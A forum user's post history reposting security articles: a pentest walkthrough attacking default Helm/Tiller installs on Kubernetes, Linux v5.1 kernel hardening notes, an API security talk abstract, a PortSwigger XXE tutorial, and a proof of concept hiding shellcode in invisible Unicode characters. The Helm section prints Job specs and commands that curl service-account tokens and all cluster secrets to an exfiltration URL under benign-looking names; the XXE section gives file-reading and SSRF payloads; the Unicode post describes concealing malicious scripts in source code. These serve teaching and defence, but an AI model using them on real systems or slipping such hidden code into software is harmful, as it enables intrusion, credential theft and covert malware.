Jump to content

Nytro

Administrators
  • Posts

    18727
  • Joined

  • Last visited

  • Days Won

    707

Posts posted by Nytro

  1. Attacking default installs of Helm on Kubernetes

    28 JANUARY 2019 on pentestkuberneteshelmtillergke

    Table of Contents

    Intro

    I have totally fallen down the Kubernetes rabbit hole and am really enjoying playing with it and attacking it. One thing I've noticed is although there are a lot of great resources to get up and running with it really quickly, there are far fewer that take the time to make sure it's set up securely. And a lot of these tutorials and quick-start guides leave out important security options for the sake of simplicity.

    In my opinion, one of the biggest offenders of this is Helm, the "package manager for Kubernetes". There are countless tutorials and Stack Overflow answers that completely gloss over the security recommendations and take steps that really put the entire cluster at risk. More and more organizations I've talked to recently actually seem to be ditching the cluster side install of Helm ("Tiller") entirely for security reasons, and I wanted to explore and explain why.

    In this post, I'll set up a default GKE cluster with Helm and Tiller, then walk through how an attacker who compromises a running pod could abuse the lack of security controls to completely take over the cluster and become full admin.

    tl;dr

    The "simple" way to install Helm requires cluster-admin privileges to be given to its pod, and then exposes a gRPC interface inside the cluster without any authentication. This endpoint allows any compromised pod to deploy arbitrary Kubernetes resources and escalate to full admin. I wrote a few Helm charts that can take advantage of this here: https://github.com/ropnop/pentest_charts

    Disclaimer

    This post in only meant to practically demonstrate the risks involved in not enabling the security features for Helm. These are not vulnerabilities in Helm or Tiller and I'm not disclosing anything previously unknown. My only hope is that by laying out practical attacks, people will think twice about configuring loose RBAC policies and not enabling mTLS for Tiller.

    Installing the Environment

    To demonstrate the attack, I'm going to set up a typical web stack on Kubernetes using Google Kubernetes Engine (GKE) and Helm. I'll be installing everything using just the defaults as found on many write-ups on the internet. If you want to just get to the attacking part, feel free to skip this section and go directly to "Exploiting a Running Pod"

    Set up GKE

    I've createad a new GCP project and will be using the command line tool to spin up a new GKE cluster and gain access to it:

    $ gcloud projects create ropnop-helm-testing #create a new project
    $ gcloud config set project ropnop-helm-testing #use the new project
    $ gcloud config set compute/region us-central1
    $ gcloud config set compute/zone us-central1-c
    $ gcloud services enable container.googleapis.com #enable Kubernetes APIs
    

    Now I'm ready to create the cluster and get credentials for it. I will do it with all the default options. There are a lot of command line switches that can help lock down this cluster, but I'm not going to provide any:

    $ gcloud container clusters create ropnop-k8s-cluster
    

    After a few minutes, my cluster is up and running:

    gcloud_clusters_list

    Lastly, I get credentials and verify connectivity with kubectl:

    $ gcloud container clusters get-credentials ropnop-k8s-cluster #set up kubeconfig
    $ kubectl config get-clusters
    

    kubectl_cluster_info

    And everything looks good, time to install Helm and Tiller

    Installing Helm+Tiller

    Helm has a quickstart guide to getting up and running with Helm quickly. This guide does mention that the default installation is not secure and should only be used for non-production or internal clusters. However, several other guides on the internet skip over this fact (example1example2). And several Stack Overflow answers I've seen just have copy/paste code to install Tiller with no mention of security.

    Again, I'll be doing a default installation of Helm and Tiller, using the "easiest" method.

    Creating the service account

    Since Role Based Access Control (RBAC) is enabled by default now on every Kubernetes provider, the original way of using Helm and Tiller doesn't work. The Tiller pod needs elevated permissions to talk the Kubernetes API. Fine grain controlling of service account permissions is tricky and often overlooked, so the "easiest" way to get up and running is to create a service account for Tiller with full cluster admin privileges.

    To create a service account with cluster admin privs, I define a new ServiceAccount and ClusterRoleBinding in YAML:

    apiVersion: v1  
    kind: ServiceAccount  
    metadata:  
      name: tiller
      namespace: kube-system
    ---
    apiVersion: rbac.authorization.k8s.io/v1  
    kind: ClusterRoleBinding  
    metadata:  
      name: tiller
    roleRef:  
      apiGroup: rbac.authorization.k8s.io
      kind: ClusterRole
      name: cluster-admin
    subjects:  
      - kind: ServiceAccount
        name: tiller
        namespace: kube-system
    

    and apply it with kubectl:

    $ kubectl apply -f tiller-rbac.yaml
    

    This created a service account called tiller, generated a secret auth token for it, and gave the account full cluster admin privileges.

    Initialize Helm

    The final step is to initialize Helm with the new service account. Again, there are additional flags that can be provided to this command that will help lock it down, but I'm just going with the "defaults":

    $ helm init --service-account tiller
    

    Besides setting up our client, this command also creates a deployment and service in the kube-system namespace for Tiller. The resources are tagged with the label app=helm, so you can filter and see everything running:

    label_app_helm

    We can also see that the Tiller deployment is configured to use our cluster admin service account:

    $ kubectl -n kube-system get deployments -l 'app=helm' -o jsonpath='{.items[0].spec.template.spec.serviceAccount}'
    tiller  
    

    Installing Wordpress

    Now it's time to use Helm to install something. For this scenario, I'll be installing a Wordpress stack from the official Helm repository. This is a pretty good example of how quick and powerful Helm can be. In one command we can get a full stack deployment of Wordpress including a persistent MySQL backend.

    $ helm install stable/wordpress --name mycoolblog
    

    With no other flags, Tiller deploys all the resources into the default namespace. The "name" field gets applied as a release label on the resource, so we can view all the resources that were created:

    kubectl_get_all_myblog

    Helm took care of exposing the port for us too via a LoadBalancer service, so if we visit the external IP listed, we can see that Wordpress is indeed up and running:

    wordpress_running

    And that's it! I've got my blog up and running on Kubernetes in no time. What could go wrong now?

    Exploiting a Running Pod

    From here on out, I am going to assume that my Wordpress site has been totally compromised and an attacker has gained remote code execution on the underlying pod. This could be through a vulnerable plugin I installed or a bad misconfiguration, but let's just assume an attacker got a shell.

    Note: for purposes of this scenario I'm just giving myself a shell on the pod directly with the following command

    $ kubectl exec -it mycoolblog-wordpress-5d6c7d5464-hl972 -- /bin/bash
    

    Post Exploitation

    After landing a shell, theres a few indicators that quickly point to this being a container running on Kubernetes:

    • The file /.dockerenv exists - we're inside a Docker container
    • Various kubernetes environment variables

    kube_env_vars

    There's several good resources out there for various Kubernetes post-exploitation activities. I recommend carnal0wnage's Kubernetes master postfor a great round-up. Trying some of these techniques, though, we'll discover that the default GKE install is still fairly locked down (and updated against recent CVEs). Even though we can talk to the Kubernetes API, for example, RBAC is enabled and we can't get anything from it:

    cant_list_pods

    Time for some more reconaissance

    Service Reconaissance

    By default, Kubernetes makes service discovery within a cluster easy through kube-dns. Looking at /etc/resolv.conf we can see that this pod is configured to use kube-dns:

    nameserver 10.7.240.10  
    search default.svc.cluster.local svc.cluster.local cluster.local us-central1-c.c.ropnop-helm-testing.internal c.ropnop-helm-testing.internal google.internal  
    options ndots:5  
    

    Our search domains tell us we're in the default namespace (as well as inside a GKE project named ropnop-helm-testing).

    DNS names in kube-dns follow the format: <svc_name>.<namespace>.svc.cluster.local. Through DNS, for example, we can look up our MariaDB service that Helm created:

    $ getent hosts mycoolblog-mariadb
    10.7.242.104    mycoolblog-mariadb.default.svc.cluster.local  
    

    (Note: I'm using getent since this pod didn't have standard DNS tools installed - living off the land ftw :) )

    Even though we're in the default namespace, it's important to remember that namespaces don't provide any security. By default, there are no network policies that prevent cross-namespace communication. From this position, we can query services that are running in the kube-system namespace. For example, the kube-dns service itself:

    $ getent hosts kube-dns.kube-system.svc.cluster.local
    10.7.240.10     kube-dns.kube-system.svc.cluster.local  
    

    Through DNS, it's possible to enumerate running services in other namespaces. Remember how Tiller created a service in kube-system? Its default name is 'tiller-deploy'. If we checked for that via a DNS lookup we'd see it exists and exactly where it's at:

    dns_find_tiller

    Great! Tiller is installed in this cluster. How can we abuse it?

    Abusing tiller-deploy

    The way that Helm talks with a kubernetes cluster is over gRPC to the tiller-deploy pod. The pod then talks to the Kubernetes API with its service account token. When a helm command is run from a client, under the hood a port forward is opened up into the cluster to talk directly to the tiller-deploy service, which always points to the tiller-deploy pod on TCP 44134.

    What this means is that for a user outside the cluster, they must have the ability to open port forwards into the cluster since port 44134 is not externally exposed. However, from inside the cluster, 44134 is available and the port forward is not needed.

    We can verify that the port is open by simply tryint to curl it:

    tiller_port_open

    Since we didn't get a timeout, something is listening there. Curl fails though, since this endpoint is designed to talk gRPC, not HTTP.

    Knowing we can reach the port, if we can send the right messages, we can talk directly to Tiller - since by default, Tiller does not require any authentication for gRPC communication. And since in this default install Tiller is running with cluster-admin privileges, we can essentially run cluster admin commands without any authentication.

    Talking gRPC to Tiller

    All of the gRPC endpoints are defined in the source code in Protobuf format, so anyone can create a client to communicate to the API. But the easiest way to communicate with Tiller is just through the normal Helm client, which is a static binary anyway.

    On our compromised pod, we can download the helm binary from the official releases. To download and extract to /tmp:

    export HVER=v2.11.0 #you may need different version  
    curl -L "https://storage.googleapis.com/kubernetes-helm/helm-${HVER}-linux-amd64.tar.gz" | tar xz --strip-components=1 -C /tmp linux-amd64/helm  
    

    Note: You may need to download specific versions to match up the version running in the server. You'll see error messages telling you what version to get.

    The helm binary allows us to specify a direct address to Tiller with --host or with the HELM_HOST environment variable. By plugging in the discovered tiller-deploy service's FQDN, we can directly communicate with the Tiller pod and run arbitrary Helm commands. For example, we can see our previously installed Wordpress release!

    helm_ls

    From here, we have full control of Tiller. We can do anything a cluster admin could normally do with Helm, including installing/upgrading/deleting releases. But we still can't "directly" talk to the Kubernetes API, so let's abuse Tiller to upgrade our privileges and become full cluster admin.

    Stealing secrets with Helm and Tiller

    Tiller is configured with a service account that has cluster admin privileges. This means that the pod is using a secret, privileged service token to authenticate with the Kubernetes API. Service accounts are generally only used for "non-human" interactions with the k8s API, however anyone in possession of the secret token can still use it. If an attacker compromises Tiller's service account token, he or she can execute any Kubernetes API call with full admin privileges.

    Unfortunately, the Helm API doesn't support direct querying of secrets or other resources. Using Helm, we can only create new releases from chart templates.

    Chart templates are very well documented and allow us to template out custom resources to deploy to Kubernetes. So we just need to craft a resource in a way to exfiltrate the secret(s) we want.

    Stealing a service account token

    When the service account name is known, stealing its token is fairly straightforward. All that is needed is to launch a pod with that service account, then read the value from /var/run/secrets/kubernetes.io/serviceaccount/token, where the token value gets mounted at creation. It's possible to just define a job to read the value and use curl to POST it to a listening URL:

    apiVersion: batch/v1  
    kind: Job  
    metadata:  
      name: tiller-deployer # something benign looking
      namespace: kube-system
    spec:  
      template:
        spec:
          serviceAccountName: tiller # hardcoded service account name
          containers:
            - name: tiller-deployer # something benign looking
              image: byrnedo/alpine-curl
              command: ["curl"]
              args: ["-d", "@/var/run/secrets/kubernetes.io/serviceaccount/token", "$(EXFIL_URL)"]
              env:
                - name: EXFIL_URL
                  value: "https://<listening_url>" # replace URL here
          restartPolicy: Never
      backoffLimit: 5
    

    Of course, since we don't hace access to the Kubernetes API directly and are using Helm, we can't just send this YAML - we have to send a Chart.

    I've created a chart to run the above job:

    https://github.com/ropnop/pentest_charts/tree/master/charts/exfil_sa_token

    This chart is also packaged up and served from a Chart Repo here: https://ropnop.github.io/pentest_charts/

    This Chart takes a few values:

    • name - the name of the release, job and pod. Probably best to call it something benign looking (e.g. "tiller-deployer")
    • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
    • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function to dump to Slack)
    • namespace - defaults to kube-system, but you can override it

    To deploy this chart and exfil the tiller service account token, we have to first "initialize" Helm in our pod:

    $ export HELM_HOME=/tmp/helmhome
    $ /tmp/helm init --client-only
    

    Once it initializes, we can deploy the chart directly and pass it the values via command line:

    $ export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134
    $ /tmp/helm install --name tiller-deployer \
        --set serviceAccountName=tiller \
        --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" \
        --repo https://ropnop.github.io/pentest_charts exfil_sa_token
    

    Our Job was successfully deployed:

    helm_job_created

    And I got the tiller service account token POSTed back to me in Slack :)

    token_dumped_slack

    After the job completes, it's easy to clean up everything and delete all the resources with Helm purge:

    $ /tmp/helm delete --purge tiller-deployer
    

    Stealing all secrets from Kubernetes

    While you can always use the "exfil_sa_token" chart to steal service account tokens, it's predicated on one thing: you know the name of the service account.

    In the above case, an attacker would have to pretty much guess that the service account name was "tiller", or the attack wouldn't work. In this scenario, since we don't have access to the Kubernetes API to query service accounts, and we can't look it up through Tiller, there's no easy way to just pull out a service account token if it has a unique name.

    The other option we have though, is to use Helm to create a new, highly privileged service account, and then use that to extract all the other Kubnernetes secrets. To accomplish that, we create a new ServiceAccount and ClusterRoleBinding then attach it to a new job that extracts all Kubernetes secrets via the API. The YAML definitions to do that would look something like this:

    ---
    apiVersion: v1  
    kind: ServiceAccount  
    metadata:  
      name: tiller-deployer #benign looking service account
      namespace: kube-system
    ---
    apiVersion: rbac.authorization.k8s.io/v1  
    kind: ClusterRoleBinding  
    metadata:  
      name: tiller-deployer
    roleRef:  
      apiGroup: rbac.authorization.k8s.io
      kind: ClusterRole
      name: cluster-admin # full cluster-admin privileges
    subjects:  
      - kind: ServiceAccount
        name: tiller-deployer
        namespace: kube-system
    ---
    apiVersion: batch/v1  
    kind: Job  
    metadata:  
      name: tiller-deployer # something benign looking
      namespace: kube-system
    spec:  
      template:
        spec:
          serviceAccountName: tiller-deployer # newly created service account
          containers:
            - name: tiller-deployer # something benign looking
              image: rflathers/kubectl:bash # alpine+curl+kubectl+bash
              command:
                - "/bin/bash"
                - "-c"
                - "curl --data-binary @<(kubectl get secrets --all-namespaces -o json) $(EXFIL_URL)"
              env:
                - name: EXFIL_URL
                  value: "https://<listening_url>" # replace URL here
          restartPolicy: Never
    

    In the same vein as above, I packaged the above resources into a Helm chart:

    https://github.com/ropnop/pentest_charts/tree/master/charts/exfil_secrets

    This Chart also takes the same values:

    • name - the name of the release, job and pod. Probably best to call it something benign looking (e.g. "tiller-deployer")
    • serviceAccountName - the name of the cluster-admin service account to create and use (again, use something innocuous looking)
    • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function to dump to Slack)
    • namespace - defaults to kube-system, but you can override it

    When this chart is installed, it will create a new cluster-admin service account, then launch a job using that service account to query for every secret in all namespaces, and dump that data in a POST body back to EXFIL_URL.

    Just like above, we can launch this from our compromised pod:

    $ export HELM_HOST=tiller-deploy.kube-system.svc.cluster.local:44134
    $ export HELM_HOME=/tmp/helmhome
    $ /tmp/helm init --client-only
    $ /tmp/helm install --name tiller-deployer \
        --set serviceAccountName="tiller-deployer" \
        --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" \
        --repo https://ropnop.github.io/pentest_charts exfil_secrets
    

    After Helm installs the chart, we'll get every Kubernetes secret dumped back to our exfil URL (in my case posted in Slack)

    slack_all_secrets

    And then make sure to clean up and remove the new service account and job:

    $ /tmp/helm delete --purge tiller-deployer
    

    With the secrets in JSON form, you can use jq to extract out plaintext passwords, tokens and certificates:

    cat all_secrets.json | jq '[.items[] | . as $secret| .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]'  
    

    And searching through that you can find the service account token tiller uses:

    tiller_sa_token_json

    Using service account tokens

    Now armed with Tiller's service account token, we can finally directly talk to the Kubernetes API from within our compromised pod. The token value needs to be added as a header in the request: Authorization: Bearer <token_here>

    $ export TOKEN="eyJhb...etc..."
    $ curl -k -H "Authorization: Bearer $TOKEN" https://10.7.240.1:443/
    

    Working from within the cluster is annoying though, since it is always going to require us to execute commands from our compromised pod. Since this is a GKE cluster, we should be able to access the Kubernetes API over the internet if we find the correct endpoint.

    For GKE, you can pull data about the Kubernetes cluster (including the master endpoint) from the Google Cloud Metadata API from the compromised pod:

    $ curl -s -kH "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env | grep KUBERNETES_MASTER_NAME
    KUBERNETES_MASTER_NAME: 104.154.18.15  
    

    Armed with the IP address and Tiller's token, you can then configure kubectl from anywhere to talk to the GKE cluster on that endpoint:

    $ kubectl config set-cluster pwnedgke --server=https://104.154.18.15
    $ kubectl config set-credentials tiller --token=$TILLER_TOKEN
    $ kubectl config set-context pwnedgke --cluster pwnedgke --user tiller
    $ kubectl config use-context pwnedgke
    $ kubectl --insecure-skip-tls-verify cluster-info
    

    Note: I'm skipping TLS verify because I didn't configure the cluster certificate

    For example, let's take over the GKE cluster from Kali: 
    kali_cluster_admin

    And that's it - we have full admin control over this GKE cluster :)

    There is a ton more we can do to maintain persistence (especially after dumping all the secrets previously), but that will remain a topic for future posts.

    Defenses

    This entire scenario was created to demonstrate how the "default" installation of Helm and Tiller (as well as GKE) can make it really easy for an attacker to escalate privileges and take over the entire cluster if a pod is compromised.

    If you are considering using Helm and Tiller in production, I stronglyrecommend following everything outlined here:

    https://github.com/helm/helm/blob/master/docs/securing_installation.md

    mTLS should be configured for Tiller, and RBAC should be as locked down as possible. Or don't create a Tiller service and require admins to do manual port forwards to the pod.

    Or ask yourself if you really need Tiller at all - I have seen more and more organizations simply abandon Tiller all together and just use Helm client-side for templating.

    For GKE, Google has a good writeup as well on securing a cluster for production:

    https://cloud.google.com/solutions/prep-kubernetes-engine-for-prod.

    Using VPCs, locking down access, filtering metadata, and enforcing network policies should be done at a minimum.

    Sadly, a lot of these security controls are hard to implement, and require a lot more effort and research to get right. It's not surprising to me then that a lot of default installations still make their way to production.

    Hope this helps someone! Let me know if you have any questions or want me to focus on anything more in the future. I'm hoping this is just the first of several Kubernetes related posts.

    -ropnop

     

    Sursa: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

  2. May 27, 2019

    security things in Linux v5.1

    Filed under: Blogging,Chrome OS,Debian,Kernel,Security,Ubuntu,Ubuntu-Server — kees @ 8:49 pm

    Previously: v5.0.

    Linux kernel v5.1 has been released! Here are some security-related things that stood out to me:

     

    introduction of pidfd


    Christian Brauner landed the first portion of his work to remove pid races from the kernel: using a file descriptor to reference a process (“pidfd”). Now /proc/$pid can be opened and used as an argument for sending signals with the new pidfd_send_signal() syscall. This handle will only refer to the original process at the time the open() happened, and not to any later “reused” pid if the process dies and a new process is assigned the same pid. Using this method, it’s now possible to racelessly send signals to exactly the intended process without having to worry about pid reuse. (BTW, this commit wins the 2019 award for Most Well Documented Commit Log Justification.)

     

    explicitly test for userspace mappings of heap memory


    During Linux Conf AU 2019 Kernel Hardening BoF, Matthew Wilcox noted that there wasn’t anything in the kernel actually sanity-checking when userspace mappings were being applied to kernel heap memory (which would allow attackers to bypass the copy_{to,from}_user() infrastructure). Driver bugs or attackers able to confuse mappings wouldn’t get caught, so he added checks. To quote the commit logs: “It’s never appropriate to map a page allocated by SLAB into userspace” and “Pages which use page_type must never be mapped to userspace as it would destroy their page type”. The latter check almost immediately caught a bad case, which was quickly fixed to avoid page type corruption.

     

    LSM stacking: shared security blobs


    Casey Shaufler has landed one of the major pieces of getting multiple Linux Security Modules (LSMs) running at the same time (called “stacking”). It is now possible for LSMs to share the security-specific storage “blobs”associated with various core structures (e.g. inodes, tasks, etc) that LSMs can use for saving their state (e.g. storing which profile a given task confined under). The kernel originally gave only the single active “major” LSM (e.g. SELinux, Apprmor, etc) full control over the entire blob of storage. With “shared” security blobs, the LSM infrastructure does the allocation and management of the memory, and LSMs use an offset for reading/writing their portion of it. This unblocks the way for “medium sized” LSMs (like SARA and Landlock) to get stacked with a “major” LSM as they need to store much more state than the “minor” LSMs (e.g. Yama, LoadPin) which could already stack because they didn’t need blob storage.

     

    SafeSetID LSM


    Micah Morton added the new SafeSetID LSM, which provides a way to narrow the power associated with the CAP_SETUID capability. Normally a process with CAP_SETUID can become any user on the system, including root, which makes it a meaningless capability to hand out to non-root users in order for them to “drop privileges” to some less powerful user. There are trees of processes under Chrome OS that need to operate under different user IDs and other methods of accomplishing these transitions safely weren’t sufficient. Instead, this provides a way to create a system-wide policy for user ID transitions via setuid() (and group transitions via setgid()) when a process has the CAP_SETUID capability, making it a much more useful capability to hand out to non-root processes that need to make uid or gid transitions.

     

    ongoing: refcount_t conversions


    Elena Reshetova continued landing more refcount_t conversions in core kernel code (e.g. scheduler, futex, perf), with an additional conversion in btrfs from Anand Jain. The existing conversions, mainly when combined with syzkaller, continue to show their utility at finding bugs all over the kernel.

    ongoing: implicit fall-through removal
    Gustavo A. R. Silva continued to make progress on marking more implicit fall-through cases. What’s so impressive to me about this work, like refcount_t, is how many bugs it has been finding (see all the “missing break” patches). It really shows how quickly the kernel benefits from adding -Wimplicit-fallthrough to keep this class of bug from ever returning.

     

    stack variable initialization includes scalars


    The structleak gcc plugin (originally ported from PaX) had its “by reference” coverage improved to initialize scalar types as well (making “structleak” a bit of a misnomer: it now stops leaks from more than structs). Barring compiler bugs, this means that all stack variables in the kernel can be initialized before use at function entry. For variables not passed to functions by reference, the -Wuninitialized compiler flag (enabled via -Wall) already makes sure the kernel isn’t building with local-only uninitialized stack variables. And now with CONFIG_GCC_PLUGIN_STRUCTLEAK_BYREF_ALL enabled, all variables passed by reference will be initialized as well. This should eliminate most, if not all, uninitialized stack flaws with very minimal performance cost (for most workloads it is lost in the noise), though it does not have the stack data lifetime reduction benefits of GCC_PLUGIN_STACKLEAK, which wipes the stack at syscall exit. Clang has recently gained similar automatic stack initialization support, and I’d love to this feature in native gcc. To evaluate the coverage of the various stack auto-initialization features, I also wrote regression tests in lib/test_stackinit.c.

     

    That’s it for now; please let me know if I missed anything. The v5.2 kernel development cycle is off and running already. :)

     

    © 2019, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.
    Creative Commons License

     

    Sursa: https://outflux.net/blog/archives/2019/05/27/security-things-in-linux-v5-1/

  3. Common API security pitfalls

    This page contains the resources for the talk titled "Common API security pitfalls". A recording is available at the bottom.

    commonAPIsecuritypitfalls.png
    DOWNLOAD SLIDES

    Abstract

    The shift towards an API landscape indicates a significant evolution in the way we build applications. The rise of JavaScript and mobile applications have sparked an explosion of easily-accessible REST APIs. But how do you protect access to your API? Which security aspects are no longer relevant? Which security features are an absolutely must-have, and which additional security measures do you need to take into account?

    These are hard questions, as evidenced by the deployment of numerous insecure APIs. Attend this session to find out about common API security pitfalls, that often result in compromised user accounts and unauthorized access to your data. We expose the problem that lies at the root of each of these pitfalls, and offer actionable advice to address these security problems. After this session, you will know how to assess the security of your APIs, and the best practices to improve them towards the future.

    About Philippe De Ryck

    Philippe De Ryck is the founder of Pragmatic Web Security, where he travels the world to train developers on web security and security engineering. He holds a Ph.D. in web security from KU Leuven. Google recognizes Philippe as a Google Developer Expert for his knowledge of web security and security in Angular applications.

     

    Sursa: https://pragmaticwebsecurity.com/talks/commonapisecuritypitfalls

  4. XML external entity (XXE) injection

    In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.

    What is XML external entity injection?

    XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.

    In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

    XXE injection

    How do XXE vulnerabilities arise?

    Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.

    XML external entities are a type of custom XML entity whose defined values are loaded from outside of the DTD in which they are declared. External entities are particularly interesting from a security perspective because they allow an entity to be defined based on the contents of a file path or URL.

    What are the types of XXE attacks?

    There are various types of XXE attacks:

    Exploiting XXE to retrieve files

    To perform an XXE injection attack that retrieves an arbitrary file from the server's filesystem, you need to modify the submitted XML in two ways:

    • Introduce (or edit) a DOCTYPE element that defines an external entity containing the path to the file.
    • Edit a data value in the XML that is returned in the application's response, to make use of the defined external entity.

    For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

    <?xml version="1.0" encoding="UTF-8"?>
    <stockCheck><productId>381</productId></stockCheck>

    The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    <stockCheck><productId>&xxe;</productId></stockCheck>

    This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application's response to include the contents of the file:

    Invalid product ID: root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    ...

    Note

    With real-world XXE vulnerabilities, there will often be a large number of data values within the submitted XML, any one of which might be used within the application's response. To test systematically for XXE vulnerabilities, you will generally need to test each data node in the XML individually, by making use of your defined entity and seeing whether it appears within the response.

    Exploiting XXE to perform SSRF attacks

    Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform server-side request forgery (SSRF). This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access.

    To exploit an XXE vulnerability to perform an SSRF attack, you need to define an external XML entity using the URL that you want to target, and use the defined entity within a data value. If you can use the defined entity within a data value that is returned in the application's response, then you will be able to view the response from the URL within the application's response, and so gain two-way interaction with the backend system. If not, then you will only be able to perform blind SSRF attacks (which can still have critical consequences).

    In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure:

    <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>

    Blind XXE vulnerabilities

    Many instances of XXE vulnerabilities are blind. This means that the application does not return the values of any defined external entities in its responses, and so direct retrieval of server-side files is not possible.

    Blind XXE vulnerabilities can still be detected and exploited, but more advanced techniques are required. You can sometimes use out-of-band techniques to find vulnerabilities and exploit them to exfiltrate data. And you can sometimes trigger XML parsing errors that lead to disclosure of sensitive data within error messages.

    Finding hidden attack surface for XXE injection

    Attack surface for XXE injection vulnerabilities is obvious in many cases, because the application's normal HTTP traffic includes requests that contain data in XML format. In other cases, the attack surface is less visible. However, if you look in the right places, you will find XXE attack surface in requests that do not contain any XML.

    XInclude attacks

    Some applications receive client-submitted data, embed it on the server-side into an XML document, and then parse the document. An example of this occurs when client-submitted data is placed into a backend SOAP request, which is then processed by the backend SOAP service.

    In this situation, you cannot carry out a classic XXE attack, because you don't control the entire XML document and so cannot define or modify a DOCTYPE element. However, you might be able to use XInclude instead. XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

    To perform an XInclude attack, you need to reference the XInclude namespace and provide the path to the file that you wish to include. For example:

    <foo xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include parse="text" href="file:///etc/passwd"/></foo>

    XXE attacks via file upload

    Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents. Examples of XML-based formats are office document formats like DOCX and image formats like SVG.

    For example, an application might allow users to upload images, and process or validate these on the server after they are uploaded. Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.

    XXE attacks via modified content type

    Most POST requests use a default content type that is generated by HTML forms, such as application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.

    For example, if a normal request contains the following:

    POST /action HTTP/1.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 7

    foo=bar

    Then you might be able submit the following request, with the same result:

    POST /action HTTP/1.0
    Content-Type: text/xml
    Content-Length: 52

    <?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>

    If the application tolerates requests containing XML in the message body, and parses the body content as XML, then you can reach the hidden XXE attack surface simply by reformatting requests to use the XML format.

    How to find and test for XXE vulnerabilities

    The vast majority of XXE vulnerabilities can be found quickly and reliably using Burp Suite's web vulnerability scanner.

    Manually testing for XXE vulnerabilities generally involves:

    • Testing for file retrieval by defining an external entity based on a well-known operating system file and using that entity in data that is returned in the application's response.
    • Testing for blind XXE vulnerabilities by defining an external entity based on a URL to a system that you control, and monitoring for interactions with that system. Burp Collaborator client is perfect for this purpose.
    • Testing for vulnerable inclusion of user-supplied non-XML data within a server-side XML document by using an XInclude attack to try to retrieve a well-known operating system file.

    How to prevent XXE vulnerabilities

    Virtually all XXE vulnerabilities arise because the application's XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.

    Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.

     

    Sursa: https://portswigger.net/web-security/xxe

  5. PoC: Encoding Shellcode Into Invisible Unicode Characters

     
    Malware has been using unicode since time ago, to hide / obfuscate urls, filenames, scripts, etc... Right-to-left Override character (e2 80 ae) is a classic. In this post  a PoC is shared, where a shellcode is hidden / encoded into a string in a python script (probably this would work with other languages too), with invisible unicode characers that will not be displayed by the most of the text editors.

    The idea is quite simple. We will choose three "invisible" unicode characters:
     
    invisible_unicode.png

    e2 80 8b  :   bit 0
    e2 80 8c  :   bit 1
    e2 80 8d  :   delimiter

    With this, and having a potentially malicious script, we can encode the malicious script, bit by bit, into these unicode characters:

    (delimiter e2 80 8d)  .....encoded script (bit 0 to e2 80 8b, bit 1 to e2 80 8c)......   (delimiter e2 80 8d)

    I have used this simple script to encode the malicious script:

    https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/encode.py

    Now, we can embbed this encoded "invisible" unicode chars into a string. The following source code looks like a simple hello world:

    https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/helloworld.py

     
    helloworld.png

    However, if you download and open the file with an hexadecimal editor you can see all that encoded information that is part of the hello world string:
     
    helloworld_hex.png

    Most of the text editors that I tested didn't display the unicode characters: Visual Studio, Geany, Sublime, Notepad, browsers, etc...

    The following script decodes and executes a secondary potentially malicious python script (the PoC script only executes calc) from invisible unicode characters:

    https://github.com/vallejocc/PoC-Hide-Python-Malscript-UnicodeChars/blob/master/malicious.py

    And the following script decodes a x64 shellcode (the shellcode executes calc) from invisible unicode characters, then it loads the shellcode with VirtualAlloc+WriteProtectMemory, and calls CreateThread to execute it:

